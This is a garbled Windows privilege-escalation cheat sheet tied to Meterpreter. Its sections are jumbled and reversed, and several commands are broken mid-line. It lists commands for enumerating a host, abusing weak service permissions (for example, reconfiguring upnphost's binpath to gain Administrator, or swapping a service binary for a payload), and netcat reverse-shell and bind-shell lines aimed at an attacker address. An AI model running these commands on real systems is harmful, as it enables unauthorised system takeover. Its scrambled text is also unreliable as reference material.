METERPRETER EXPLIT SUGGESTER WINDOWS
Then query the service using Windows sc: $ sc qc $ accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula For Windows XP, version 5.2 of accesschk is needed: $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula If wmic and sc is not available, you can use accesschk. Using meterpreter: > exploit/windows/local/service_permissions Or remove the dependency: $ sc config upnphost depend= "" If it fails because of a missing dependency, run the following: $ sc config SSDPSRV start= auto
You get Administrator with: $ sc config upnphost binpath= "C:\Inetpub\sc config upnphost obj= ".\LocalSystem" password= "" Windows XP SP1 is known to be vulnerable to EoP in upnphost. If you don't have access to vmic, you can do: $ sc qc upnphost You can also manually check each service using cacls: $ cacls "C:\path\to\file.exe" If wmic is not available we can use sc.exe: $ sc query state= all | findstr "SERVICE_NAME:" > Servicenames.txtįOR /F %i in (Servicenames.txt) DO echo %iįOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO %i > services.txtįOR /F %i in (services.txt) DO qc %i | findstr "BINARY_PATH_NAME" > path.txt $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" The following commands will print the affected services: $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do %a > c:\windows\temp\permissions.txt Net stop & net start $ sc start/stop serviceName Replace the affected service with your payload and and restart the service running: $ wmic service NAMEOFSERVICE call startservice More info about permissions: Ĭommon exploitation payloads involve: Replacing the affecting binary with a reverse shell or a command that creates a new user and adds it to the Administrator group. We are interested in services where permissions are: BUILTIN\Users with (F) or (C) or (M) for our group. You can replace the binary, restart the service and get system. List windows services $ net start $ wmic service list brief $ tasklist /SVC EoP 1: Incorrect permissions in servicesĪ service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. List scheduled tasks $ schtasks /query /fo LIST /v Network information $ ipconfig /all & route print & arp -aįirewall information $ netsh firewall show state Information about a user $ net users Administrator Get exact OS version $ type C:/Windows/system32/eula.txtįind current user.
Reverse shell: $ nc.exe attacker_ip attacker_port -e cmd.exe EoP 0: System infoįinding installed software, running processes, bind ports, and OS version might be critical to identify the right EoP vector.įind installed patches, architecture, OS version $ systeminfo Getting a shell in limited interpreters: $ system("start cmd.exe /k $cmd")īind cmd to a port: $ nc.exe -Lp 31337 -vv -e cmd.exe EoP 5: Services only available from loopback.EoP 3: ClearText passwords (quick hits).EoP 1: Incorrect permissions in services.
Windows elevation of privileges Windows elevation of privileges ToC
0 kommentar(er)
